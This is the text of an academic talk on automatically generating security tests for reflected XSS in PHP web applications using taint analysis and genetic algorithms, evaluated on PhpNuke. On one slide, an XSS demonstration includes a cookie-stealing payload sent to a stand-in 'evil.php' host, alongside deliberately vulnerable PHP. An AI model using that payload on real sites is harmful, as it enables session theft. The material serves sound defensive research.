
Towards security testing with

taint analysis and genetic algorithms

Presented by Mariano Ceccato

[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
FBK – Bruno Kessler Foundation
• FBK (more than 350 researchers)
is a research organization of the
Autonomous Province of Trento
that promotes research in the
areas of:
– science,
– technology and
– humanities

• FBK objectives are to:
– conduct research that obtains recognition at an international level;
– carry out applied research of strategic importance to the province;
– publicize scientific results and promote economic development; and
– encourage innovation throughout the province.
2
FBK – CIT
• Center for Information Technology works mainly
in three areas:
– Engineering
– Content
– Interaction

3
Software Engineering unit
• Goal oriented requirements modeling
– Norm compliant requirements
– Requirements engineering for Adaptive Software systems
– Requirements formalization/prioritization
• Agent oriented software engineering
– Tropos
• Reverse engineering and re-engineering
– Automatic migration of legacy systems
– Reverse engineering of Object Oriented systems
• Testing
– Automatic test case generation
– Testing of Web 2.0 (Ajax) applications
– Testing of future internet applications
– Security testing of web applications

4
Unit at a glance
People
Tenured   Postdoc   PhD   Progs   Total
5         3         6     1       15

Projects active in 2010
Name                                  Type         Duration
IBT (Info. Bancaria Trentina)         Industrial   2007-2011
A-cube (Ambient Aware Assistance)     PAT          2008-2011
CERN (Code quality at Alice)          Industrial   2010-2012
FITTEST (Future Internet Testing)     EU-FP7       2010-2013
IoS (Internet of Services)            JRP          2009-2013
L’architettura delle performance      Ministero    2010-2013
5
About me
• In particular I work on:
– Security testing of web applications
– Empirical studies in software engineering
– Code transformation and re-engineering

6
Security vulnerabilities
• Web applications are publicly exposed to a hostile environment
• Successful attacks may cause
– Sensitive information disclosure
– Revenue loss
• XSS (cross-site scripting) is one of the most prominent security vulnerabilities

8
Current situation
• Methodologies exist to formalize access control and data
confidentiality (e.g. encryption)
• Approaches exist for intrusion detection and vulnerability
identification on the network layer
• A mature, consolidated approach is lacking on the
application layer
– Responsibility is often delegated to “experts”
– Tools are used only as a starting point for manual investigation
– Firewalls or monitors are adopted to block suspicious activity
(similar to an anti-virus)
• Annoying for users
• Blocking only known threats

9
Static analysis
• Valuable help for manual review: it provides
starting points (candidate vulnerabilities)

• Limitations:
– Dynamic constructs are not evaluated
(reflective calls, pointers, …)
– Conservative approach (false positives)
– Does not provide examples, just points where
to start looking

10
The vision
• Taking advantage of testing-specific
methodologies for security testing
– Automatic generation of test cases
– Definition of a “security adequate” test suite
– Definition of a security oracle

11
Contributions
• Focus on reflected XSS vulnerabilities
• We resort to search-based software
engineering, using genetic algorithms
• Generation of (security) test cases for
candidate vulnerabilities identified by static
analysis
– Test cases demonstrate how security can be
broken, a valuable support for the maintainer
• Validation on a case study

12
XSS example

13
XSS example
<?PHP
$a = $_GET[ "name" ] ;
echo "Your name is: ";
echo $a;
?>

www.mysite.com?name=Mariano
Your name is: Mariano

www.mysite.com?name=<a href="" onclick="this.href='evil.php?data='%2Bdocument.cookie">click here</a>
Your name is: click here

evil.php?data=23333456fdd333
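As a rough illustration (written in Python rather than PHP, purely for the sketch), the snippet below mimics the page above. `render_unsafe` echoes the parameter verbatim, while `render_escaped` applies `html.escape`, which plays a role similar to PHP's `htmlspecialchars`. Both function names and the `PAYLOAD` constant are hypothetical.

```python
import html

# The attack string from the slide, with %2B already URL-decoded to "+".
PAYLOAD = (
    '<a href="" onclick="this.href=\'evil.php?data=\'+document.cookie">'
    "click here</a>"
)


def render_unsafe(name: str) -> str:
    """Echo the parameter verbatim, as the PHP page above does."""
    return "Your name is: " + name


def render_escaped(name: str) -> str:
    """Escape HTML metacharacters before echoing the parameter."""
    return "Your name is: " + html.escape(name, quote=True)


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))   # markup reaches the browser unchanged
    print(render_escaped(PAYLOAD))  # markup is rendered as inert text
```

With escaping, the browser shows the payload as text instead of building a clickable link that leaks the cookie.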

14
XSS on the CFG

 1  $a = $_GET[ "first name" ] ;          // Tainted
 2  $b = $_GET[ "surname" ] ;             // Tainted
 3  if ( strpos ( $a , "<script" ) ) {
 4      $a = htmlspecialchars ( $a ) ;    // Un-tainted
    }                                     // ??
 5  if ( isset ( $b ) )
 6      $go_on_b = true ;
    else
 7      $go_on_b = false ;
 8  if ( $go_on_b ) {
 9      $b = htmlspecialchars ( $b ) ;
    }
10  echo $a;                              // Sink
11  if ( $go_on_b ) {
12      echo $b;                          // Sink
    }

15
Taint analysis

 1  $a = $_GET[ "first name" ] ;          // Tainted
 2  $b = $_GET[ "surname" ] ;
 3  if ( strpos ( $a , "<script" ) ) {
 4      $a = htmlspecialchars ( $a ) ;    // Skip
    }
 5  if ( isset ( $b ) )
 6      $go_on_b = true ;
    else
 7      $go_on_b = false ;
 8  if ( $go_on_b ) {
 9      $b = htmlspecialchars ( $b ) ;
    }
10  echo $a;                              // Sink
11  if ( $go_on_b ) {
12      echo $b;
    }

16
Taint analysis

 1  $a = $_GET[ "first name" ] ;
 2  $b = $_GET[ "surname" ] ;             // Tainted
 3  if ( strpos ( $a , "<script" ) ) {
 4      $a = htmlspecialchars ( $a ) ;
    }
 5  if ( isset ( $b ) )
 6      $go_on_b = true ;
    else
 7      $go_on_b = false ;
 8  if ( $go_on_b ) {
 9      $b = htmlspecialchars ( $b ) ;    // Skip
    }
10  echo $a;
11  if ( $go_on_b ) {                     // Require
12      echo $b;                          // Sink
    }
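The annotations on the two slides above can be reproduced with a small sketch. It tracks taint along one given execution path, which is a simplification and not the static analysis used by the authors. The `STATEMENTS` table and the function name `tainted_sinks` are hypothetical; the node numbers are those of the listing.

```python
# Toy model of the 12-statement example: node number -> (kind, variable).
# Nodes not listed here (conditions, flag assignments) do not affect taint.
STATEMENTS = {
    1: ("source", "a"),
    2: ("source", "b"),
    4: ("sanitize", "a"),
    9: ("sanitize", "b"),
    10: ("sink", "a"),
    12: ("sink", "b"),
}


def tainted_sinks(path):
    """Return the sink nodes that receive a tainted variable along `path`."""
    tainted = set()
    hits = []
    for node in path:
        kind, var = STATEMENTS.get(node, ("other", None))
        if kind == "source":
            tainted.add(var)
        elif kind == "sanitize":
            tainted.discard(var)
        elif kind == "sink" and var in tainted:
            hits.append(node)
    return hits


if __name__ == "__main__":
    # Statement 4 is skipped and statement 9 is executed on this path.
    print(tainted_sinks([1, 2, 3, 5, 6, 8, 9, 10, 11, 12]))
```

The function does not check whether a path is feasible; it only reports what would happen if that path were executed.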

17
False positive

 1  $a = $_GET[ "first name" ] ;
 2  $b = $_GET[ "surname" ] ;
 3  if ( strpos ( $a , "<script" ) ) {
 4      $a = htmlspecialchars ( $a ) ;
    }
 5  if ( isset ( $b ) )
 6      $go_on_b = true ;
    else
 7      $go_on_b = false ;
 8  if ( $go_on_b ) {                     // skipping 9 requires $go_on_b == false
 9      $b = htmlspecialchars ( $b ) ;
    }
10  echo $a;
11  if ( $go_on_b ) {                     // reaching 12 requires $go_on_b == true
12      echo $b;
    }
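To see why the candidate on `$b` is a false positive, the listing can be re-created as a small simulation that records which statements execute. This is a hand-written Python approximation of the PHP code, not part of the authors' tool; `run_page` and `target_covered` are hypothetical names, and an absent `surname` key models an unset parameter.

```python
def run_page(params):
    """Approximate the 12-statement PHP example; return executed statement numbers."""
    trace = [1, 2, 3]
    a = params.get("first name", "")
    b = params.get("surname")  # None models an unset parameter
    # PHP's strpos yields an offset or false; offset 0 is also falsy in `if`.
    if a.find("<script") > 0:
        trace.append(4)
    trace.append(5)
    if b is not None:
        trace.append(6)
        go_on_b = True
    else:
        trace.append(7)
        go_on_b = False
    trace.append(8)
    if go_on_b:
        trace.append(9)
    trace.append(10)
    trace.append(11)
    if go_on_b:
        trace.append(12)
    return trace


def target_covered(trace):
    """True if the trace skips statement 9 and still executes statement 12."""
    return 9 not in trace and 12 in trace


if __name__ == "__main__":
    samples = [{}, {"surname": "x"}, {"first name": "x<script>", "surname": "<b>"}]
    print(any(target_covered(run_page(p)) for p in samples))
```

A handful of sample inputs proves nothing by itself, but here statements 9 and 12 are guarded by the same flag, so no input can skip one and reach the other.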

18
Test case generation
• Taint analysis is a good starting point
– It provides candidate vulnerabilities
– It does not provide executable examples
– It may report false positives

• Generation of input values that make the execution traverse
the vulnerability
– The problem is stated as a search problem
– The search space is too wide for an exhaustive search
– We do not know the full path to execute, only a subset of the
branches to traverse
– A search heuristic is more appropriate: a genetic algorithm

19
Genetic algorithms
• Individuals represent candidate solutions to the problem (tests)
• Input values are represented as chromosomes
• A fitness function filters out less suitable individuals and
preserves more suitable ones
• More suitable individuals are recombined to
generate a new population that is at least as fit as
the previous one

Initial population → Fitness calculation → Crossover → Mutation → New population
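The cycle above can be sketched as a generic loop. This is a minimal illustration under stated assumptions, not the authors' implementation: truncation selection and elitism are choices made here (elitism is one simple way to keep the best fitness from decreasing between generations), the default parameter values are the ones listed on the tool prototype slide, and the `toy_*` functions are a hypothetical bit-string problem used only to make the loop runnable.

```python
import random


def evolve(init, fitness, crossover, mutate, target,
           pop_size=70, generations=500, p_cross=0.70, p_mut=0.01, rng=None):
    """Run a simple genetic algorithm and return the fittest individual found."""
    if rng is None:
        rng = random.Random(0)
    population = [init(rng) for _ in range(pop_size)]
    for _ in range(generations):
        scored = sorted(population, key=fitness, reverse=True)
        if fitness(scored[0]) >= target:
            return scored[0]
        parents = scored[: max(2, pop_size // 2)]  # truncation selection (assumption)
        children = [scored[0]]                     # elitism: keep the current best
        while len(children) < pop_size:
            p1, p2 = rng.sample(parents, 2)
            c1, c2 = crossover(p1, p2, rng) if rng.random() < p_cross else (p1, p2)
            for child in (c1, c2):
                if rng.random() < p_mut:
                    child = mutate(child, rng)
                children.append(child)
        population = children[:pop_size]
    return max(population, key=fitness)


# Hypothetical toy problem: maximize the number of 1s in an 8-bit list.
def toy_init(rng):
    return [rng.randint(0, 1) for _ in range(8)]


def toy_fitness(individual):
    return sum(individual)


def toy_crossover(p1, p2, rng):
    cut = rng.randrange(1, len(p1))
    return p1[:cut] + p2[cut:], p2[:cut] + p1[cut:]


def toy_mutate(individual, rng):
    i = rng.randrange(len(individual))
    return individual[:i] + [1 - individual[i]] + individual[i + 1:]


if __name__ == "__main__":
    best = evolve(toy_init, toy_fitness, toy_crossover, toy_mutate, target=8)
    print(best, toy_fitness(best))
```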

20
Fitness function
• Individuals nearer to the
solution are rewarded with a
higher fitness value
(they are more fit)
• The fitness function is the approach
level:
– Number of branches to
traverse in order to
execute/skip particular
statements
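One possible reading of this fitness, sketched below, counts how many target statements a test handles as required: statements that must execute do execute, and statements that must be skipped are skipped. The function name, its signature, and the use of statement numbers from the earlier 12-statement listing are assumptions made for illustration; the slides do not give the exact formula.

```python
def approach_level(trace, must_execute, must_skip):
    """Count the target statements that the executed trace treats as required.

    trace        -- statement numbers executed by the test
    must_execute -- statements the test has to reach (e.g. the sink)
    must_skip    -- statements the test has to avoid (e.g. the sanitizer)
    """
    executed = set(trace)
    reached = sum(1 for s in must_execute if s in executed)
    avoided = sum(1 for s in must_skip if s not in executed)
    return reached + avoided


if __name__ == "__main__":
    # Candidate on $a: reach sink 10 while skipping sanitizer 4.
    trace = [1, 2, 3, 5, 6, 8, 9, 10, 11, 12]
    print(approach_level(trace, must_execute={10}, must_skip={4}))
```

Under this reading a test reaches the maximum value when every target statement is satisfied, which matches the "n (100%)" style of reporting used in the results table.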

{ (a, Mariano), (b, Ceccato) }

http://mysite.com?a=Mariano&b=Ceccato
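The mapping between a chromosome and a request URL shown above can be sketched with the Python standard library. The helper names `chromosome_to_url` and `url_to_chromosome` are hypothetical; a chromosome is assumed to be a list of (parameter, value) pairs.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit


def chromosome_to_url(base_url, chromosome):
    """Encode a list of (parameter, value) pairs as a GET request URL."""
    return base_url + "?" + urlencode(chromosome)


def url_to_chromosome(url):
    """Decode the query string of a URL back into (parameter, value) pairs."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


if __name__ == "__main__":
    chromosome = [("a", "Mariano"), ("b", "Ceccato")]
    url = chromosome_to_url("http://mysite.com", chromosome)
    print(url)
    print(url_to_chromosome(url))
```

`urlencode` also percent-encodes characters such as `<` and `>`, so mutated values stay valid inside a URL.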
21
Crossover

Parents:
{(firstname, john), (surname, smith), (age, 23)}
{(firstname, mark), (address, broadway), (job, teacher)}

Offspring:
{(firstname, john), (surname, smith), (job, teacher)}
{(firstname, mark), (address, broadway), (age, 23)}
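The example above is consistent with a one-point crossover that cuts both chromosomes after the second pair and swaps the tails. A minimal sketch follows; the function name and the explicit `cut` argument are assumptions, and a real tool would typically pick the cut point at random.

```python
def one_point_crossover(parent1, parent2, cut):
    """Swap the tails of two chromosomes after position `cut`."""
    child1 = parent1[:cut] + parent2[cut:]
    child2 = parent2[:cut] + parent1[cut:]
    return child1, child2


if __name__ == "__main__":
    p1 = [("firstname", "john"), ("surname", "smith"), ("age", "23")]
    p2 = [("firstname", "mark"), ("address", "broadway"), ("job", "teacher")]
    for child in one_point_crossover(p1, p2, cut=2):
        print(child)
```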

22
Mutation

{(firstname, john), (surname, smith)}

↓ Add pair   ↑ Remove pair

{(firstname, john), (surname, smith), (age, 23)}

↓ Change parameter value

{(firstname, john), (surname, smithx3scr), (age, 23)}
{(firstname, john), (surname, xmith), (age, 23)}
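The three mutation operators above could look roughly like this. The function names are hypothetical, and the two ways of changing a value (replacing one character, or appending a short random suffix) are guesses based on the `xmith` and `smithx3scr` examples rather than the authors' exact operators.

```python
import random
import string


def add_pair(chromosome, name, value):
    """Return a copy of the chromosome with one more (parameter, value) pair."""
    return chromosome + [(name, value)]


def remove_pair(chromosome, index):
    """Return a copy of the chromosome without the pair at `index`."""
    return chromosome[:index] + chromosome[index + 1:]


def change_value(chromosome, index, rng):
    """Return a copy in which the value at `index` is randomly altered."""
    name, value = chromosome[index]
    alphabet = string.ascii_lowercase + string.digits
    if value and rng.random() < 0.5:
        # Replace a single character, e.g. smith -> xmith.
        pos = rng.randrange(len(value))
        value = value[:pos] + rng.choice(alphabet) + value[pos + 1:]
    else:
        # Append a short random suffix, e.g. smith -> smithx3scr.
        value += "".join(rng.choice(alphabet) for _ in range(rng.randint(1, 5)))
    return chromosome[:index] + [(name, value)] + chromosome[index + 1:]


if __name__ == "__main__":
    rng = random.Random(0)
    base = [("firstname", "john"), ("surname", "smith")]
    grown = add_pair(base, "age", "23")
    print(grown)
    print(remove_pair(grown, 2))
    print(change_value(grown, 1, rng))
```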

23
Tool prototype

Application under analysis (<?php ?>) → Static analysis → Candidate vulnerabilities → Genetic search → Test case

• Evolution parameters:
– 70 individuals
– 500 generations
– Pr_crossover = 0.70
– Pr_mutation = 0.01

24
Sanity check with random testing
• 50,000 test cases are generated for each vulnerability
• Random generation procedure:
– take a subset of the page parameters
– for each of them, randomly generate a value in one of these ways:
• Completely random
• Chosen from the constant strings in the application code
• We compute the approach level for each random test
• The maximum approach level for each vulnerability is compared with
the one obtained with the genetic algorithm
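The random baseline described above can be sketched as follows. The function names, the 50/50 split between the two value sources, and the maximum string length are assumptions; `fitness` stands for whatever function computes the approach level of a test.

```python
import random
import string


def random_value(rng, constants, max_len=12):
    """Pick a constant from the application code or build a random string."""
    if constants and rng.random() < 0.5:  # 50/50 split is an assumption
        return rng.choice(constants)
    length = rng.randint(0, max_len)
    return "".join(rng.choice(string.printable) for _ in range(length))


def random_test(rng, parameters, constants):
    """Choose a random subset of page parameters and assign each a value."""
    chosen = rng.sample(parameters, rng.randint(0, len(parameters)))
    return [(name, random_value(rng, constants)) for name in chosen]


def best_random_fitness(fitness, parameters, constants, n_tests=50_000, seed=0):
    """Return the maximum fitness reached over `n_tests` random tests."""
    rng = random.Random(seed)
    return max(fitness(random_test(rng, parameters, constants))
               for _ in range(n_tests))


if __name__ == "__main__":
    params = ["first name", "surname"]
    consts = ["<script", "surname"]
    # Placeholder fitness: number of parameters set (for demonstration only).
    print(best_random_fitness(len, params, consts, n_tests=1000))
```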

• Case study: PhpNuke 6.9
– Open source CMS, 1046 files, 157 kloc

25
Experimental results

Vulnerability     Target statements   Genetic algorithm   Random testing
confirmNewUser1   4                   2 (50%)             1 (25%)
confirmNewUser2   4                   2 (50%)             1 (25%)
confirmNewUser3   3                   3 (100%)            1 (25%)
finishNewUser     4                   2 (50%)             2 (50%)
userinfo          2                   2 (100%)            1 (50%)
mail_password     5                   5 (100%)            1 (20%)
userinfo          2                   2 (100%)            2 (100%)
edithome          3                   2 (67%)             2 (67%)
my_headline       5                   2 (40%)             1 (20%)

26
Considerations
• The genetic algorithm passes the sanity check against random testing
• If the algorithm converges, a solution is found in
fewer than 50 generations:
– Test cases are generated only for feasible paths
– When no solution is found, either the path is infeasible
or the approach fails: manual analysis is required
• Test cases trigger execution paths in which a
tainted variable is used in a sink
• A test case shows how input data can skip
validation routines
• A test case does not exploit a vulnerability, it only
executes the vulnerable code.

27
Future work
• More advanced fitness functions (branch distance)
• More specific mutation operators and string
generation
– Based on syntax definition
– When strings represent dates, numbers, enums, …
• Integration of/comparison with concolic execution
• Generation of real attacks
• Further investigation on
– Persistent, DOM-based XSS
– SQL-injection
– CSRF

28
Conclusions
• Static analysis can be used to help manual
review (candidate vulnerable points)
• We combined it with genetic algorithms to
generate actual test cases (input values)
• Automatic test case generation for
candidate vulnerabilities
– To show how vulnerabilities affect the code
• A prototype was implemented and applied to a real
PHP application

29
Questions?

30
